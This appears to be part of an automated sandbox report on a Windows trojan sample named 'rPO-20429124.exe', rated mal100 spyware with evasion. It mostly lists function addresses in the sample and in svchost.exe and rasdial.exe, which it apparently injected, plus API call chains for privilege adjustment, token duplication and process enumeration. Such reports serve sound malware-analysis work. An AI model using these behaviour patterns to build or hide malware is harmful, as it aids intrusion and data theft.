Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0019A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0019A1EF

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00188310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00188310

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_001951BD

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0013E6A0	0_2_0013E6A0
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0015D975	0_2_0015D975
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001521C5	0_2_001521C5
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001662D2	0_2_001662D2
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001B03DA	0_2_001B03DA
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0016242E	0_2_0016242E
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001525FA	0_2_001525FA
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0018E616	0_2_0018E616
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001466E1	0_2_001466E1
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0016878F	0_2_0016878F
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00148808	0_2_00148808
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001B0857	0_2_001B0857
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00166844	0_2_00166844
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00198889	0_2_00198889
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0015CB21	0_2_0015CB21
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00166DB6	0_2_00166DB6
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00146F9E	0_2_00146F9E
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00143030	0_2_00143030
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00153187	0_2_00153187
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0015F1D9	0_2_0015F1D9
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00131287	0_2_00131287
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00151484	0_2_00151484
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00145520	0_2_00145520
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00157696	0_2_00157696
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00145760	0_2_00145760
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00151978	0_2_00151978
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00169AB5	0_2_00169AB5
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0013FCE0	0_2_0013FCE0
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00151D90	0_2_00151D90
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0015BDA6	0_2_0015BDA6
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001B7DDB	0_2_001B7DDB
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0013DF00	0_2_0013DF00
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00143FE0	0_2_00143FE0
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_038D3610	0_2_038D3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004186D3	2_2_004186D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004168CF	2_2_004168CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004168D3	2_2_004168D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410093	2_2_00410093
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E093	2_2_0040E093
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011D0	2_2_004011D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1D8	2_2_0040E1D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1E3	2_2_0040E1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402B53	2_2_00402B53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402358	2_2_00402358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402360	2_2_00402360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402B60	2_2_00402B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE6A	2_2_0040FE6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040266D	2_2_0040266D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402670	2_2_00402670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE73	2_2_0040FE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EEB3	2_2_0042EEB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E2F30	2_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344CFE0	2_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BDE4F6	4_2_04BDE4F6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BD4420	4_2_04BD4420
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE2446	4_2_04BE2446
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BF0591	4_2_04BF0591
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B30535	4_2_04B30535
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B4C6E0	4_2_04B4C6E0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B2C7C0	4_2_04B2C7C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B30770	4_2_04B30770
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B54750	4_2_04B54750
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BC2000	4_2_04BC2000
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BF01AA	4_2_04BF01AA
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE41A2	4_2_04BE41A2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE81CC	4_2_04BE81CC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BCA118	4_2_04BCA118
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B20100	4_2_04B20100
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BB8158	4_2_04BB8158
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BB02C0	4_2_04BB02C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BD0274	4_2_04BD0274
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B3E3F0	4_2_04B3E3F0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BF03E6	4_2_04BF03E6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEA352	4_2_04BEA352
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BD0CB5	4_2_04BD0CB5
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B20CF2	4_2_04B20CF2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B30C00	4_2_04B30C00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B48DBF	4_2_04B48DBF
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B2ADE0	4_2_04B2ADE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BCCD1F	4_2_04BCCD1F
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B3AD00	4_2_04B3AD00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B42E90	4_2_04B42E90
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BECE93	4_2_04BECE93
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEEEDB	4_2_04BEEEDB
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEEE26	4_2_04BEEE26
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B30E59	4_2_04B30E59
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BAEFA0	4_2_04BAEFA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B3CFE0	4_2_04B3CFE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B22FC8	4_2_04B22FC8
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B50F30	4_2_04B50F30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BD2F30	4_2_04BD2F30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B72F28	4_2_04B72F28
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BA4F40	4_2_04BA4F40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B168B8	4_2_04B168B8
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B5E8F0	4_2_04B5E8F0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B3A840	4_2_04B3A840
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B32840	4_2_04B32840
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B329A0	4_2_04B329A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BFA9A6	4_2_04BFA9A6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B46962	4_2_04B46962
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B2EA80	4_2_04B2EA80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE6BD7	4_2_04BE6BD7
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEAB40	4_2_04BEAB40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEF43F	4_2_04BEF43F
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B21460	4_2_04B21460
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BCD5B0	4_2_04BCD5B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BF95C3	4_2_04BF95C3
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE7571	4_2_04BE7571
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE16CC	4_2_04BE16CC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B75630	4_2_04B75630
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEF7B0	4_2_04BEF7B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE70E9	4_2_04BE70E9
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEF0E0	4_2_04BEF0E0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BDF0CC	4_2_04BDF0CC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B370C0	4_2_04B370C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B3B1B0	4_2_04B3B1B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B1F172	4_2_04B1F172
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BFB16B	4_2_04BFB16B
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B6516C	4_2_04B6516C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B352A0	4_2_04B352A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BD12ED	4_2_04BD12ED
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B4B2C0	4_2_04B4B2C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B7739A	4_2_04B7739A
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE132D	4_2_04BE132D
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B1D34C	4_2_04B1D34C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEFCF2	4_2_04BEFCF2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BA9C32	4_2_04BA9C32
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B4FDC0	4_2_04B4FDC0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE7D73	4_2_04BE7D73
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE1D5A	4_2_04BE1D5A
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B33D40	4_2_04B33D40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B39EB0	4_2_04B39EB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEFFB1	4_2_04BEFFB1
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B31F92	4_2_04B31F92
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04AF3FD5	4_2_04AF3FD5
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04AF3FD2	4_2_04AF3FD2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEFF09	4_2_04BEFF09
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B338E0	4_2_04B338E0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B9D800	4_2_04B9D800
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BC5910	4_2_04BC5910
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B39950	4_2_04B39950
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B4B950	4_2_04B4B950
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BCDAAC	4_2_04BCDAAC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B75AA0	4_2_04B75AA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BD1AA3	4_2_04BD1AA3
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BDDAC6	4_2_04BDDAC6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BA3A6C	4_2_04BA3A6C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEFA49	4_2_04BEFA49
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BE7A46	4_2_04BE7A46
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B4FB80	4_2_04B4FB80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BA5BF0	4_2_04BA5BF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B6DBF9	4_2_04B6DBF9
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04BEFB76	4_2_04BEFB76
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A41DD0	4_2_00A41DD0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3CC37	4_2_00A3CC37
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3CC40	4_2_00A3CC40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3CE60	4_2_00A3CE60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3AE60	4_2_00A3AE60
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3AFA5	4_2_00A3AFA5
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3AFB0	4_2_00A3AFB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A454A0	4_2_00A454A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A436A0	4_2_00A436A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A4369C	4_2_00A4369C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A5BC80	4_2_00A5BC80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_0483E64C	4_2_0483E64C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_0483D718	4_2_0483D718
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_0483E194	4_2_0483E194
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_0483E2B7	4_2_0483E2B7

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: String function: 00150AE3 appears 70 times
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: String function: 00137DE1 appears 35 times
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: String function: 00158900 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 102 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 04B1B970 appears 280 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 04B77E54 appears 111 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 04B65130 appears 58 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 04B9EA12 appears 86 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 04BAF290 appears 105 times

Source: rPO-20429124.exe, 00000000.00000003.2067289814.0000000003E13000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rPO-20429124.exe
Source: rPO-20429124.exe, 00000000.00000003.2066267216.0000000003FBD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rPO-20429124.exe

Source: rPO-20429124.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/10

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0019A06A GetLastError,FormatMessageW,

0_2_0019A06A

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001881CB AdjustTokenPrivileges,CloseHandle,		0_2_001881CB
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_001887E1

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0019B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0019B333

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_001AEE0D

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_0019C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0019C397

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00134E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00134E89

